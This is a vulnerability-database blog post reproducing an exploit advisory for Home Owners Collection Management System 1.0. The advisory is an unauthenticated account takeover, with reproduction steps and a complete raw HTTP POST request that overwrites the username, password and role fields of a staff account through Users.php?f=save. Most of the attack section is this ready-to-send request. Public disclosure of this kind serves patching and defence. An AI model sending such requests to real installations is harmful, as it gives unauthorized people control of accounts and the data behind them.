Wednesday, March 9, 2022

Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated)

# Exploit Title: Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated)
# Date: 9/02/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Linux 


Home Owners Collection Management System is vulnerable to unauthenticated account takeover.
An attacker can takeover any registered 'Staff' user account by just sending below POST request
By changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters

#Steps to Reproduce

1. Send the below POST request by changing "id", "firstname", "lastname" , "username" , "password" ,"type" parameters.

2. Go to http://localhost/hocms/admin/ and Log in to the user account by changed username and password


==============================================

POST /hocms/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------8012296389370411172619882391
Content-Length: 899
Origin: http://localhost
Connection: close
Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju

-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="id"


-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="firstname"

hi
-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="lastname"

test
-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="username"

saud
-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="password"

saud
-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="type"

1
-----------------------------8012296389370411172619882391
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------8012296389370411172619882391--
            
 

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore